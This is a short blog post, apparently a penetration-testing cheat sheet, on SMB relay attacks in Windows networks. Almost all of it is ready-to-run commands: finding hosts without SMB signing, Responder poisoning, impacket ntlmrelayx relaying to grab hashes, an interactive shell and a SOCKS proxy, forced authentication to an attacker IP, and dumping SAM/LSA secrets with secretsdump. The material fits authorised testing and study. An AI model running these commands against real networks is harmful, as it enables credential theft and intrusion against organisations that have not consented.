Post

SMB Relay Attack

Posted Updated
Preview Image
By
1 min read
SMB Relay Attack

SMB Relay Attack

SMB relay is a man-in-the-middle attack where an attacker intercepts NTLM authentication between a client and server, then relays those credentials to a target server. The attacker doesn’t need to crack passwords - they simply forward the authentication in real-time.

Detection

1
2
3

nmap --script smb-security-mode.nse,smb2-security-mode.nse -p445 $ip

nxc smb $ip/24 --gen-relay-list target.txt

1.Method —> Hashes

1
2
3
4
5

# Generate List of Target
nxc smb $ip/24 --gen-relay-list target.txt

# Start ntlmrelayx
impacket-ntlmrelayx -tf target_file or -t single_target  -smb2support     # Wait for few seconds you will able to Grab hashes.

2.Method —> Interactive shell

slightly changes in conf file

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# use sed:
sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf

# start your Responder
sudo responder -I eth0 -dwv

# Terminal 2: Generate relay targets
nxc smb $ip/24 --gen-relay-list targets.txt

# Terminal 3: Start relay
sudo ntlmrelayx.py -tf targets.txt -smb2support  -i

# Get your shell
nc 127.0.0.1 <port>

3.Method —> SOCKS Proxy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# Terminal 1: Responder
sudo responder -I eth0 -dwv

# Terminal 2: ntlmrelayx with SOCKS
nxc smb $ip/24 --gen-relay-list targets.txt
sudo ntlmrelayx.py -tf targets.txt -smb2support -socks

# Terminal 3: Check active sessions
# (inside ntlmrelayx)
socks

# Terminal 4: Use proxychains
echo "socks4 127.0.0.1 1080" | sudo tee -a /etc/proxychains4.conf
proxychains nxc smb $ip -u '' -p '' --sam --lsa
proxychains secretsdump.py DOMAIN/user@ip -no-pass

4.Method —> Active Coercion with NetExec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# Terminal 1: Generate targets
nxc smb $ip/24 --gen-relay-list nosigning.txt

# Terminal 2: Start relay
sudo ntlmrelayx.py -tf nosigning.txt -smb2support -socks

# Terminal 3: Check coercion vulns
nxc smb $ip/24 -u user -p pass -M coerce_plus

# Terminal 4: Trigger coercion
nxc smb $ip -u user -p pass -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true

# Result: Machine  authenticates to ntlmrelayx
# → Credentials relayed to targets in nosigning.txt
# → SOCKS session established
AD- Attacks
SMB Relay Attack
This post is licensed under CC BY 4.0 by the author.